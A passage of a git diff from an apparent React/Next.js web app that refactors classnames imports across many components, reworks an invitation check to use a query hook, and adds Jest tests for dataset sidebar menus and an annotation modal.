RiCalendarLine } from '@remixicon/react' import type { Dayjs } from 'dayjs' import type { FC } from 'react' import React, { useCallback } from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { formatToLocalTime } from '@/utils/format' import { useI18N } from '@/context/i18n' import Picker from '@/app/components/base/date-and-time-picker/date-picker' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx index f99ea52492..0a80bf670d 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx @@ -6,7 +6,7 @@ import { SimpleSelect } from '@/app/components/base/select' import type { Item } from '@/app/components/base/select' import dayjs from 'dayjs' import { RiArrowDownSLine, RiCheckLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useTranslation } from 'react-i18next' const today = dayjs() diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error Reproduction', () => { // Capture console errors const originalError = console.error diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx index 246a1eb6a3..17c919bf22 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx @@ -4,7 +4,7 @@ import React, { useCallback, useRef, useState } from 'react' import type { PopupProps } from './config-popup' import ConfigPopup from './config-popup' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx index 628eb13071..767ccb8c59 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx @@ -12,7 +12,7 @@ import Indicator from '@/app/components/header/indicator' import Switch from '@/app/components/base/switch' import Tooltip from '@/app/components/base/tooltip' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const I18N_PREFIX = 'app.tracing' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx index eecd356e08..e170159e35 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Input from '@/app/components/base/input' type Props = { diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx index 2c17931b83..319ff3f423 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx @@ -12,7 +12,7 @@ import type { AliyunConfig, ArizeConfig, DatabricksConfig, LangFuseConfig, LangS import { TracingProvider } from './type' import TracingIcon from './tracing-icon' import ConfigButton from './config-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIcon, ArizeIcon, DatabricksIcon, LangfuseIcon, LangsmithIcon, MlflowIcon, OpikIcon, PhoenixIcon, TencentIcon, WeaveIcon } from '@/app/components/base/icons/src/public/tracing' import Indicator from '@/app/components/header/indicator' import { fetchTracingConfig as doFetchTracingConfig, fetchTracingStatus, updateTracingStatus } from '@/service/apps' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx index ac1704d60d..0779689c76 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx @@ -6,7 +6,7 @@ import { } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { TracingProvider } from './type' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIconBig, ArizeIconBig, DatabricksIconBig, LangfuseIconBig, LangsmithIconBig, MlflowIconBig, OpikIconBig, PhoenixIconBig, TencentIconBig, WeaveIconBig } from '@/app/components/base/icons/src/public/tracing' import { Eye as View } from '@/app/components/base/icons/src/vender/solid/general' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx index ec9117dd38..aeca1cd3ab 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { TracingIcon as Icon } from '@/app/components/base/icons/src/public/tracing' type Props = { diff --git a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx index 3effb79f20..3581587b54 100644 --- a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx +++ b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx @@ -23,7 +23,7 @@ import { useDatasetDetail, useDatasetRelatedApps } from '@/service/knowledge/use import useDocumentTitle from '@/hooks/use-document-title' import ExtraInfo from '@/app/components/datasets/extra-info' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IAppDetailLayoutProps = { children: React.ReactNode diff --git a/web/app/(shareLayout)/webapp-reset-password/layout.tsx b/web/app/(shareLayout)/webapp-reset-password/layout.tsx index e0ac6b9ad6..13073b0e6a 100644 --- a/web/app/(shareLayout)/webapp-reset-password/layout.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' export default function SignInLayout({ children }: any) { diff --git a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx index 5e3f6fff1d..843f10e039 100644 --- a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx @@ -2,7 +2,7 @@ import { useCallback, useState } from 'react' import { useTranslation } from 'react-i18next' import { useRouter, useSearchParams } from 'next/navigation' -import cn from 'classnames' +import { cn } from '@/utils/classnames' import { RiCheckboxCircleFill } from '@remixicon/react' import { useCountDown } from 'ahooks' import Button from '@/app/components/base/button' diff --git a/web/app/(shareLayout)/webapp-signin/layout.tsx b/web/app/(shareLayout)/webapp-signin/layout.tsx index 7649982072..c75f925d40 100644 --- a/web/app/(shareLayout)/webapp-signin/layout.tsx +++ b/web/app/(shareLayout)/webapp-signin/layout.tsx @@ -1,6 +1,6 @@ 'use client' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import type { PropsWithChildren } from 'react' diff --git a/web/app/(shareLayout)/webapp-signin/normalForm.tsx b/web/app/(shareLayout)/webapp-signin/normalForm.tsx index 219722eef3..a14bfcd737 100644 --- a/web/app/(shareLayout)/webapp-signin/normalForm.tsx +++ b/web/app/(shareLayout)/webapp-signin/normalForm.tsx @@ -7,7 +7,7 @@ import Loading from '@/app/components/base/loading' import MailAndCodeAuth from './components/mail-and-code-auth' import MailAndPasswordAuth from './components/mail-and-password-auth' import SSOAuth from './components/sso-auth' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { LicenseStatus } from '@/types/feature' import { IS_CE_EDITION } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' diff --git a/web/app/account/oauth/authorize/layout.tsx b/web/app/account/oauth/authorize/layout.tsx index 2ab676d6b6..b70ab210d0 100644 --- a/web/app/account/oauth/authorize/layout.tsx +++ b/web/app/account/oauth/authorize/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import { AppContextProvider } from '@/context/app-context' diff --git a/web/app/activate/activateForm.tsx b/web/app/activate/activateForm.tsx index d9d07cbfa1..11fc4866f3 100644 --- a/web/app/activate/activateForm.tsx +++ b/web/app/activate/activateForm.tsx @@ -1,13 +1,13 @@ 'use client' +import { useEffect } from 'react' import { useTranslation } from 'react-i18next' -import useSWR from 'swr' import { useRouter, useSearchParams } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' -import { invitationCheck } from '@/service/common' import Loading from '@/app/components/base/loading' import useDocumentTitle from '@/hooks/use-document-title' +import { useInvitationCheck } from '@/service/use-common' const ActivateForm = () => { useDocumentTitle('') @@ -26,19 +26,21 @@ const ActivateForm = () => { token, }, } - const { data: checkRes } = useSWR(checkParams, invitationCheck, { - revalidateOnFocus: false, - onSuccess(data) { - if (data.is_valid) { - const params = new URLSearchParams(searchParams) - const { email, workspace_id } = data.data - params.set('email', encodeURIComponent(email)) - params.set('workspace_id', encodeURIComponent(workspace_id)) - params.set('invite_token', encodeURIComponent(token as string)) - router.replace(`/signin?${params.toString()}`) - } - }, - }) + const { data: checkRes } = useInvitationCheck({ + ...checkParams.params, + token: token || undefined, + }, true) + + useEffect(() => { + if (checkRes?.is_valid) { + const params = new URLSearchParams(searchParams) + const { email, workspace_id } = checkRes.data + params.set('email', encodeURIComponent(email)) + params.set('workspace_id', encodeURIComponent(workspace_id)) + params.set('invite_token', encodeURIComponent(token as string)) + router.replace(`/signin?${params.toString()}`) + } + }, [checkRes, router, searchParams, token]) return (
{ diff --git a/web/app/components/app-sidebar/app-info.tsx b/web/app/components/app-sidebar/app-info.tsx index f143c2fcef..1b4377c10a 100644 --- a/web/app/components/app-sidebar/app-info.tsx +++ b/web/app/components/app-sidebar/app-info.tsx @@ -29,7 +29,7 @@ import CardView from '@/app/(commonLayout)/app/(appDetailLayout)/[appId]/overvie import type { Operation } from './app-operations' import AppOperations from './app-operations' import dynamic from 'next/dynamic' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' const SwitchAppModal = dynamic(() => import('@/app/components/app/switch-app-modal'), { diff --git a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx index 3c5d38dd82..04634906af 100644 --- a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx @@ -16,7 +16,7 @@ import AppInfo from './app-info' import NavLink from './navLink' import { useStore as useAppStore } from '@/app/components/app/store' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' type Props = { diff --git a/web/app/components/app-sidebar/dataset-info/dropdown.tsx b/web/app/components/app-sidebar/dataset-info/dropdown.tsx index ff110f70bd..dc46af2d02 100644 --- a/web/app/components/app-sidebar/dataset-info/dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-info/dropdown.tsx @@ -2,7 +2,7 @@ import React, { useCallback, useState } from 'react' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import ActionButton from '../../base/action-button' import { RiMoreFill } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Menu from './menu' import { useSelector as useAppContextWithSelector } from '@/context/app-context' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' diff --git a/web/app/components/app-sidebar/dataset-info/index.spec.tsx b/web/app/components/app-sidebar/dataset-info/index.spec.tsx new file mode 100644 index 0000000000..3674be6658 --- /dev/null +++ b/web/app/components/app-sidebar/dataset-info/index.spec.tsx @@ -0,0 +1,379 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DatasetInfo from './index' +import Dropdown from './dropdown' +import Menu from './menu' +import MenuItem from './menu-item' +import type { DataSet } from '@/models/datasets' +import { + ChunkingMode, + DataSourceType, + DatasetPermission, +} from '@/models/datasets' +import { RETRIEVE_METHOD } from '@/types/app' +import { RiEditLine } from '@remixicon/react' + +let mockDataset: DataSet +let mockIsDatasetOperator = false +const mockReplace = jest.fn() +const mockInvalidDatasetList = jest.fn() +const mockInvalidDatasetDetail = jest.fn() +const mockExportPipeline = jest.fn() +const mockCheckIsUsedInApp = jest.fn() +const mockDeleteDataset = jest.fn() + +const createDataset = (overrides: Partial = {}): DataSet => ({ + id: 'dataset-1', + name: 'Dataset Name', + indexing_status: 'completed', + icon_info: { + icon: '📙', + icon_background: '#FFF4ED', + icon_type: 'emoji', + icon_url: '', + }, + description: 'Dataset description', + permission: DatasetPermission.onlyMe, + data_source_type: DataSourceType.FILE, + indexing_technique: 'high_quality' as DataSet['indexing_technique'], + created_by: 'user-1', + updated_by: 'user-1', + updated_at: 1690000000, + app_count: 0, + doc_form: ChunkingMode.text, + document_count: 1, + total_document_count: 1, + word_count: 1000, + provider: 'internal', + embedding_model: 'text-embedding-3', + embedding_model_provider: 'openai', + embedding_available: true, + retrieval_model_dict: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + retrieval_model: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + tags: [], + external_knowledge_info: { + external_knowledge_id: '', + external_knowledge_api_id: '', + external_knowledge_api_name: '', + external_knowledge_api_endpoint: '', + }, + external_retrieval_model: { + top_k: 0, + score_threshold: 0, + score_threshold_enabled: false, + }, + built_in_field_enabled: false, + runtime_mode: 'rag_pipeline', + enable_api: false, + is_multimodal: false, + ...overrides, +}) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + replace: mockReplace, + }), +})) + +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset?: DataSet }) => unknown) => selector({ dataset: mockDataset }), +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (state: { isCurrentWorkspaceDatasetOperator: boolean }) => unknown) => + selector({ isCurrentWorkspaceDatasetOperator: mockIsDatasetOperator }), +})) + +jest.mock('@/service/knowledge/use-dataset', () => ({ + datasetDetailQueryKeyPrefix: ['dataset', 'detail'], + useInvalidDatasetList: () => mockInvalidDatasetList, +})) + +jest.mock('@/service/use-base', () => ({ + useInvalid: () => mockInvalidDatasetDetail, +})) + +jest.mock('@/service/use-pipeline', () => ({ + useExportPipelineDSL: () => ({ + mutateAsync: mockExportPipeline, + }), +})) + +jest.mock('@/service/datasets', () => ({ + checkIsUsedInApp: (...args: unknown[]) => mockCheckIsUsedInApp(...args), + deleteDataset: (...args: unknown[]) => mockDeleteDataset(...args), +})) + +jest.mock('@/hooks/use-knowledge', () => ({ + useKnowledge: () => ({ + formatIndexingTechniqueAndMethod: () => 'indexing-technique', + }), +})) + +jest.mock('@/app/components/datasets/rename-modal', () => ({ + __esModule: true, + default: ({ + show, + onClose, + onSuccess, + }: { + show: boolean + onClose: () => void + onSuccess?: () => void + }) => { + if (!show) + return null + return ( +
+ + +
+ ) + }, +})) + +const openMenu = async (user: ReturnType) => { + const trigger = screen.getByRole('button') + await user.click(trigger) +} + +describe('DatasetInfo', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + mockIsDatasetOperator = false + }) + + // Rendering of dataset summary details based on expand and dataset state. + describe('Rendering', () => { + it('should show dataset details when expanded', () => { + // Arrange + mockDataset = createDataset({ is_published: true }) + render() + + // Assert + expect(screen.getByText('Dataset Name')).toBeInTheDocument() + expect(screen.getByText('Dataset description')).toBeInTheDocument() + expect(screen.getByText('dataset.chunkingMode.general')).toBeInTheDocument() + expect(screen.getByText('indexing-technique')).toBeInTheDocument() + }) + + it('should show external tag when provider is external', () => { + // Arrange + mockDataset = createDataset({ provider: 'external', is_published: false }) + render() + + // Assert + expect(screen.getByText('dataset.externalTag')).toBeInTheDocument() + expect(screen.queryByText('dataset.chunkingMode.general')).not.toBeInTheDocument() + }) + + it('should hide detailed fields when collapsed', () => { + // Arrange + render() + + // Assert + expect(screen.queryByText('Dataset Name')).not.toBeInTheDocument() + expect(screen.queryByText('Dataset description')).not.toBeInTheDocument() + }) + }) +}) + +describe('MenuItem', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Event handling for menu item interactions. + describe('Interactions', () => { + it('should call handler when clicked', async () => { + const user = userEvent.setup() + const handleClick = jest.fn() + // Arrange + render() + + // Act + await user.click(screen.getByText('Edit')) + + // Assert + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) +}) + +describe('Menu', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + }) + + // Rendering of menu options based on runtime mode and delete visibility. + describe('Rendering', () => { + it('should show edit, export, and delete options when rag pipeline and deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'rag_pipeline' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.getByText('datasetPipeline.operations.exportPipeline')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + + it('should hide export and delete options when not rag pipeline and not deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'general' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.queryByText('datasetPipeline.operations.exportPipeline')).not.toBeInTheDocument() + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) +}) + +describe('Dropdown', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset({ pipeline_id: 'pipeline-1', runtime_mode: 'rag_pipeline' }) + mockIsDatasetOperator = false + mockExportPipeline.mockResolvedValue({ data: 'pipeline-content' }) + mockCheckIsUsedInApp.mockResolvedValue({ is_using: false }) + mockDeleteDataset.mockResolvedValue({}) + if (!('createObjectURL' in URL)) { + Object.defineProperty(URL, 'createObjectURL', { + value: jest.fn(), + writable: true, + }) + } + if (!('revokeObjectURL' in URL)) { + Object.defineProperty(URL, 'revokeObjectURL', { + value: jest.fn(), + writable: true, + }) + } + }) + + // Rendering behavior based on workspace role. + describe('Rendering', () => { + it('should hide delete option when user is dataset operator', async () => { + const user = userEvent.setup() + // Arrange + mockIsDatasetOperator = true + render() + + // Act + await openMenu(user) + + // Assert + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) + + // User interactions that trigger modals and exports. + describe('Interactions', () => { + it('should open rename modal when edit is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByTestId('rename-modal')).toBeInTheDocument() + }) + + it('should export pipeline when export is clicked', async () => { + const user = userEvent.setup() + const anchorClickSpy = jest.spyOn(HTMLAnchorElement.prototype, 'click') + const createObjectURLSpy = jest.spyOn(URL, 'createObjectURL') + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('datasetPipeline.operations.exportPipeline')) + + // Assert + await waitFor(() => { + expect(mockExportPipeline).toHaveBeenCalledWith({ + pipelineId: 'pipeline-1', + include: false, + }) + }) + expect(createObjectURLSpy).toHaveBeenCalledTimes(1) + expect(anchorClickSpy).toHaveBeenCalledTimes(1) + }) + + it('should show delete confirmation when delete is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + + // Assert + await waitFor(() => { + expect(screen.getByText('dataset.deleteDatasetConfirmContent')).toBeInTheDocument() + }) + }) + + it('should delete dataset and redirect when confirm is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + await user.click(await screen.findByRole('button', { name: 'common.operation.confirm' })) + + // Assert + await waitFor(() => { + expect(mockDeleteDataset).toHaveBeenCalledWith('dataset-1') + }) + expect(mockInvalidDatasetList).toHaveBeenCalledTimes(1) + expect(mockReplace).toHaveBeenCalledWith('/datasets') + }) + }) +}) diff --git a/web/app/components/app-sidebar/dataset-info/index.tsx b/web/app/components/app-sidebar/dataset-info/index.tsx index 44b0baa72b..bace656d54 100644 --- a/web/app/components/app-sidebar/dataset-info/index.tsx +++ b/web/app/components/app-sidebar/dataset-info/index.tsx @@ -8,7 +8,7 @@ import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import type { DataSet } from '@/models/datasets' import { DOC_FORM_TEXT } from '@/models/datasets' import { useKnowledge } from '@/hooks/use-knowledge' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Dropdown from './dropdown' type DatasetInfoProps = { diff --git a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx index ac07333712..cf380d00d2 100644 --- a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx @@ -11,7 +11,7 @@ import AppIcon from '../base/app-icon' import Divider from '../base/divider' import NavLink from './navLink' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import Effect from '../base/effect' import Dropdown from './dataset-info/dropdown' diff --git a/web/app/components/app-sidebar/index.tsx b/web/app/components/app-sidebar/index.tsx index 86de2e2034..fe52c4cfa2 100644 --- a/web/app/components/app-sidebar/index.tsx +++ b/web/app/components/app-sidebar/index.tsx @@ -9,7 +9,7 @@ import AppSidebarDropdown from './app-sidebar-dropdown' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import { useStore as useAppStore } from '@/app/components/app/store' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '../base/divider' import { useHover, useKeyPress } from 'ahooks' import ToggleButton from './toggle-button' diff --git a/web/app/components/app-sidebar/navLink.tsx b/web/app/components/app-sidebar/navLink.tsx index ad90b91250..f6d8e57682 100644 --- a/web/app/components/app-sidebar/navLink.tsx +++ b/web/app/components/app-sidebar/navLink.tsx @@ -2,7 +2,7 @@ import React from 'react' import { useSelectedLayoutSegment } from 'next/navigation' import Link from 'next/link' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { RemixiconComponentType } from '@remixicon/react' export type NavIcon = React.ComponentType< @@ -42,7 +42,7 @@ const NavLink = ({ const NavIcon = isActive ? iconMap.selected : iconMap.normal const renderIcon = () => ( -
+
) @@ -53,21 +53,17 @@ const NavLink = ({ key={name} type='button' disabled - className={classNames( - 'system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', - 'pl-3 pr-1', - )} + className={cn('system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', + 'pl-3 pr-1')} title={mode === 'collapse' ? name : ''} aria-disabled > {renderIcon()} {name} @@ -79,22 +75,18 @@ const NavLink = ({ {renderIcon()} {name} diff --git a/web/app/components/app-sidebar/toggle-button.tsx b/web/app/components/app-sidebar/toggle-button.tsx index 8de6f887f6..4f69adfc34 100644 --- a/web/app/components/app-sidebar/toggle-button.tsx +++ b/web/app/components/app-sidebar/toggle-button.tsx @@ -1,7 +1,7 @@ import React from 'react' import Button from '../base/button' import { RiArrowLeftSLine, RiArrowRightSLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Tooltip from '../base/tooltip' import { useTranslation } from 'react-i18next' import { getKeyboardKeyNameBySystem } from '../workflow/utils' diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..f226adf22b --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,47 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + 